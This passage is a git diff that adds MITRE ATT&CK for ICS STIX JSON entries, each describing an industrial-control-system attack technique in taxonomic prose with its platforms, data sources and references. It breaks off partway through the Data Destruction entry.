"kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "File: File Access", + "Network Traffic: Network Traffic Content", + "Process: Process Creation", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", + "created": "2021-04-13T12:45:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0888", + "external_id": "T0888" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3.json new file mode 100644 index 0000000000000000000000000000000000000000..6fb65632423f35e233690d9c642c8f27901640ba --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--7fff60d2-1494-45a4-b6d4-41f4752a1a0f", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Program Upload", + "description": "Adversaries may attempt to upload a program from a PLC to gather information about an industrial process. Uploading a program may allow them to acquire and study the underlying logic. Methods of program upload include vendor software, which enables the user to upload and read a program running on a PLC. This software can be used to upload the target program to a workstation, jump box, or an interfacing device.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Safety Instrumented System/Protection Relay", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0845", + "external_id": "T0845" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--32632a95-6856-47b9-9ab7-fea5cd7dce00.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--32632a95-6856-47b9-9ab7-fea5cd7dce00.json new file mode 100644 index 0000000000000000000000000000000000000000..6cd63d0d04cedc398244eb39ea4d80e6e8b1e225 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--32632a95-6856-47b9-9ab7-fea5cd7dce00.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--e9af4f20-7498-4494-9a89-254cdacd2e87", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Exploit Public-Facing Application", + "description": "Adversaries may leverage weaknesses to exploit internet-facing software for initial access into an industrial network. Internet-facing software may be user applications, underlying networking implementations, an assets operating system, weak defenses, etc. Targets of this technique may be intentionally exposed for the purpose of remote management and visibility.\n\nAn adversary may seek to target public-facing applications as they may provide direct access into an ICS environment or the ability to move into the ICS network. Publicly exposed applications may be found through online tools that scan the internet for open ports and services. Version numbers for the exposed application may provide adversaries an ability to target specific known vulnerabilities. Exposed control protocol or remote access ports found in Commonly Used Port may be of interest by adversaries.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--32632a95-6856-47b9-9ab7-fea5cd7dce00", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0819", + "external_id": "T0819" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--3405891b-16aa-4bd7-bd7c-733501f9b20f.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--3405891b-16aa-4bd7-bd7c-733501f9b20f.json new file mode 100644 index 0000000000000000000000000000000000000000..0dc9a598ec04642b6309842da58187f70a6a70bb --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--3405891b-16aa-4bd7-bd7c-733501f9b20f.json @@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--bd059675-85da-44b7-9626-4cd8b56df0c2", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T19:09:43.744Z", + "name": "Data from Information Repositories", + "description": "Adversaries may target and collect data from information repositories. This can include sensitive data such as specifications, schematics, or diagrams of control system layouts, devices, and processes. Examples of information repositories include reference databases in the process environment, as well as databases in the corporate network that might contain information about the ICS.(Citation: Cybersecurity & Infrastructure Security Agency March 2018)\n\nInformation collected from these systems may provide the adversary with a better understanding of the operational environment, vendors used, processes, or procedures of the ICS.\n\nIn a campaign between 2011 and 2013 against ONG organizations, Chinese state-sponsored actors searched document repositories for specific information such as, system manuals, remote terminal unit (RTU) sites, personnel lists, documents that included the string SCAD*, user credentials, and remote dial-up access information. (Citation: CISA AA21-201A Pipeline Intrusion July 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Data Historian" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Logon Session: Logon Session Creation", + "Network Share: Network Share Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--3405891b-16aa-4bd7-bd7c-733501f9b20f", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0811", + "external_id": "T0811" + }, + { + "source_name": "Cybersecurity & Infrastructure Security Agency March 2018", + "description": "Cybersecurity & Infrastructure Security Agency 2018, March 15 Alert (TA18-074A) Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors Retrieved. 2019/10/11 ", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA18-074A" + }, + { + "source_name": "CISA AA21-201A Pipeline Intrusion July 2021", + "description": "Department of Justice (DOJ), DHS Cybersecurity & Infrastructure Security Agency (CISA) 2021, July 20 Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013 Retrieved. 2021/10/08 ", + "url": "https://us-cert.cisa.gov/sites/default/files/publications/AA21-201A_Chinese_Gas_Pipeline_Intrusion_Campaign_2011_to_2013%20(1).pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--35392fb4-a31d-4c6a-b9f2-1c65b7f5e6b9.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--35392fb4-a31d-4c6a-b9f2-1c65b7f5e6b9.json new file mode 100644 index 0000000000000000000000000000000000000000..4204b55b253649a7170543545f48a5e49107afaf --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--35392fb4-a31d-4c6a-b9f2-1c65b7f5e6b9.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--cd203f45-ac36-46e5-ad78-cca9738aa832", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:19:41.272Z", + "name": "Transient Cyber Asset", + "description": "Adversaries may target devices that are transient across ICS networks and external networks. Normally, transient assets are brought into an environment by authorized personnel and do not remain in that environment on a permanent basis. (Citation: North American Electric Reliability Corporation June 2021) Transient assets are commonly needed to support management functions and may be more common in systems where a remotely managed asset is not feasible, external connections for remote access do not exist, or 3rd party contractor/vendor access is required. \n\nAdversaries may take advantage of transient assets in different ways. For instance, adversaries may target a transient asset when it is connected to an external network and then leverage its trusted access in another environment to launch an attack. They may also take advantage of installed applications and libraries that are used by legitimate end-users to interact with control system devices. \n\nTransient assets, in some cases, may not be deployed with a secure configuration leading to weaknesses that could allow an adversary to propagate malicious executable code, e.g., the transient asset may be infected by malware and when connected to an ICS environment the malware propagates onto other systems. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Engineering Workstation" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--35392fb4-a31d-4c6a-b9f2-1c65b7f5e6b9", + "created": "2021-10-14T15:25:32.143Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0864", + "external_id": "T0864" + }, + { + "source_name": "North American Electric Reliability Corporation June 2021", + "description": "North American Electric Reliability Corporation 2021, June 28 Glossary of Terms Used in NERC Reliability Standards Retrieved. 2021/10/11 ", + "url": "https://www.nerc.com/files/glossary_of_terms.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--36e9f5bc-ac13-4da4-a2f4-01f4877d9004.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--36e9f5bc-ac13-4da4-a2f4-01f4877d9004.json new file mode 100644 index 0000000000000000000000000000000000000000..ca93333c5278f15281e6a21d11a85dd44117f207 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--36e9f5bc-ac13-4da4-a2f4-01f4877d9004.json @@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--3e560487-f16a-48a7-ae9f-13b293971547", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-20T20:46:11.459Z", + "name": "Manipulate I/O Image", + "description": "Adversaries may manipulate the I/O image of PLCs through various means to prevent them from functioning as expected. Methods of I/O image manipulation may include overriding the I/O table via direct memory manipulation or using the override function used for testing PLC programs. (Citation: Dr. Kelvin T. Erickson December 2010) During the scan cycle, a PLC reads the status of all inputs and stores them in an image table. (Citation: Nanjundaiah, Vaidyanath) The image table is the PLCs internal storage location where values of inputs/outputs for one scan are stored while it executes the user program. After the PLC has solved the entire logic program, it updates the output image table. The contents of this output image table are written to the corresponding output points in I/O Modules. \n\nOne of the unique characteristics of PLCs is their ability to override the status of a physical discrete input or to override the logic driving a physical output coil and force the output to a desired status.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_detection": "", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Asset: Software" + ], + "type": "attack-pattern", + "id": "attack-pattern--36e9f5bc-ac13-4da4-a2f4-01f4877d9004", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0835", + "external_id": "T0835" + }, + { + "source_name": "Dr. Kelvin T. Erickson December 2010", + "description": "Dr. Kelvin T. Erickson 2010, December Programmable logic controller hardware Retrieved. 2018/03/29 ", + "url": "https://www.isa.org/standards-and-publications/isa-publications/intech/2010/december/programmable-logic-controller-hardware/" + }, + { + "source_name": "Nanjundaiah, Vaidyanath", + "description": "Nanjundaiah, Vaidyanath Dr. Kelvin T. Erickson 2010, December Programmable logic controller hardware Retrieved. 2018/03/29 PLC Ladder Logic Basics Retrieved. 2021/10/11 ", + "url": "https://www.ezautomation.net/industry-articles/plc-ladder-logic-basics.htm" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c.json new file mode 100644 index 0000000000000000000000000000000000000000..401bb9e3b2b82ab1939375e0b3d4989fdf030076 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--50835840-9f10-4567-bfd4-7d3ff7b0cdce", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Network Sniffing", + "description": "Network sniffing is the practice of using a network interface on a computer system to monitor or capture information (Citation: Enterprise ATT&CK January 2018) regardless of whether it is the specified destination for the information. \n\nAn adversary may attempt to sniff the traffic to gain information about the target. This information can vary in the level of importance. Relatively unimportant information is general communications to and from machines. Relatively important information would be login information. User credentials may be sent over an unencrypted protocol, such as Telnet, that can be captured and obtained through network packet analysis. \n\nIn addition, ARP and Domain Name Service (DNS) poisoning can be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Process: Process Creation" + ], + "type": "attack-pattern", + "id": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0842", + "external_id": "T0842" + }, + { + "source_name": "Enterprise ATT&CK January 2018", + "description": "Enterprise ATT&CK 2018, January 11 Network Sniffing Retrieved. 2018/05/17 ", + "url": "https://attack.mitre.org/wiki/Technique/T1040" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9.json new file mode 100644 index 0000000000000000000000000000000000000000..1bd102d4fb30f9b2ad6ad98f02d96ecd28ec8b08 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--9d54ffc4-b169-424b-9f29-518fa793576b", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Rootkit", + "description": "Adversaries may deploy rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting and modifying operating-system API calls that supply system information. Rootkits or rootkit-enabling functionality may reside at the user or kernel level in the operating system, or lower. (Citation: Enterprise ATT&CK January 2018) \n\nFirmware rootkits that affect the operating system yield nearly full control of the system. While firmware rootkits are normally developed for the main processing board, they can also be developed for the I/O that is attached to an asset. Compromise of this firmware allows the modification of all of the process variables and functions the module engages in. This may result in commands being disregarded and false information being fed to the main device. By tampering with device processes, an adversary may inhibit its expected response functions and possibly enable [Impact](https://attack.mitre.org/tactics/TA0105).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "evasion" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Firmware: Firmware Modification" + ], + "type": "attack-pattern", + "id": "attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0851", + "external_id": "T0851" + }, + { + "source_name": "Enterprise ATT&CK January 2018", + "description": "Enterprise ATT&CK 2018, January 11 Rootkit Retrieved. 2018/05/16 ", + "url": "https://attack.mitre.org/wiki/Technique/T1014" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--3de230d4-3e42-4041-b089-17e1128feded.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--3de230d4-3e42-4041-b089-17e1128feded.json new file mode 100644 index 0000000000000000000000000000000000000000..55e3c06cc7132db88b985a86f6a6902be6e3676d --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--3de230d4-3e42-4041-b089-17e1128feded.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--7a0d17a9-bef3-48a7-a33e-cae0ef517ab2", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Automated Collection", + "description": "Adversaries may automate collection of industrial environment information using tools or scripts. This automated collection may leverage native control protocols and tools available in the control systems environment. For example, the OPC protocol may be used to enumerate and gather information. Access to a system or interface with these native protocols may allow collection and enumeration of other attached, communicating servers and devices.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay", + "Control Server" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Script: Script Execution", + "Network Traffic: Network Traffic Content", + "File: File Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--3de230d4-3e42-4041-b089-17e1128feded", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0802", + "external_id": "T0802" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b.json new file mode 100644 index 0000000000000000000000000000000000000000..a0dea8428f3319f63e5fe208c125cf81402fdae2 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b.json @@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--f6d16847-c988-4df9-ba31-13b7959c8889", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-19T13:57:23.538Z", + "name": "Block Reporting Message", + "description": "Adversaries may block or prevent a reporting message from reaching its intended target. In control systems, reporting messages contain telemetry data (e.g., I/O values) pertaining to the current state of equipment and the industrial process. By blocking these reporting messages, an adversary can potentially hide their actions from an operator.\n\nBlocking reporting messages in control systems that manage physical processes may contribute to system impact, causing inhibition of a response function. A control system may not be able to respond in a proper or timely manner to an event, such as a dangerous fault, if its corresponding reporting message is blocked. (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011) (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_detection": "", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Input/Output Server", + "Device Configuration/Parameters" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Flow", + "Process: Process Termination", + "Operational Databases: Process/Event Alarm", + "Operational Databases: Process History/Live Data" + ], + "type": "attack-pattern", + "id": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0804", + "external_id": "T0804" + }, + { + "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011", + "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ", + "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258" + }, + { + "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016", + "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ", + "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--40b300ba-f553-48bf-862e-9471b220d455.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--40b300ba-f553-48bf-862e-9471b220d455.json new file mode 100644 index 0000000000000000000000000000000000000000..d4aaa6850a3fe4a2a0e369c79872e1d12aa1248c --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--40b300ba-f553-48bf-862e-9471b220d455.json @@ -0,0 +1,67 @@ +{ + "type": "bundle", + "id": "bundle--56e3ebbf-7eb3-498b-881c-793166934b3e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-05T14:16:02.811Z", + "name": "Unauthorized Command Message", + "description": "Adversaries may send unauthorized command messages to instruct control system assets to perform actions outside of their intended functionality, or without the logical preconditions to trigger their expected function. Command messages are used in ICS networks to give direct instructions to control systems devices. If an adversary can send an unauthorized command message to a control system, then it can instruct the control systems device to perform an action outside the normal bounds of the device's actions. An adversary could potentially instruct a control systems device to perform an action that will cause an [Impact](https://attack.mitre.org/tactics/TA0105). (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)\n\nIn the Dallas Siren incident, adversaries were able to send command messages to activate tornado alarm systems across the city without an impending tornado or other disaster. (Citation: Zack Whittaker April 2017) (Citation: Benjamin Freed March 2019)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impair-process-control" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Application Log: Application Log Content", + "Operational Databases: Process/Event Alarm", + "Network Traffic: Network Traffic Content", + "Operational Databases: Process History/Live Data" + ], + "type": "attack-pattern", + "id": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0855", + "external_id": "T0855" + }, + { + "source_name": "Benjamin Freed March 2019", + "description": "Benjamin Freed 2019, March 13 Tornado sirens in Dallas suburbs deactivated after being hacked and set off Retrieved. 2020/11/06 ", + "url": "https://statescoop.com/tornado-sirens-in-dallas-suburbs-deactivated-after-being-hacked-and-set-off/" + }, + { + "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011", + "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ", + "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258" + }, + { + "source_name": "Zack Whittaker April 2017", + "description": "Zack Whittaker 2017, April 12 Dallas' emergency sirens were hacked with a rogue radio signal Retrieved. 2020/11/06 ", + "url": "https://www.zdnet.com/article/experts-think-they-know-how-dallas-emergency-sirens-were-hacked/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675.json new file mode 100644 index 0000000000000000000000000000000000000000..a8703c81480fcf46226ea6dc5e434842fb3c4fb5 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675.json @@ -0,0 +1,61 @@ +{ + "type": "bundle", + "id": "bundle--bd332482-b2a5-4c17-82d9-f624d1805650", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-19T14:12:22.878Z", + "name": "Data Destruction", + "description": "Adversaries may perform data destruction over the course of an operation. The adversary may drop or create malware, tools, or other non-native files on a target system to accomplish this, potentially leaving behind traces of malicious activities. Such non-native files and other data may be removed over the course of 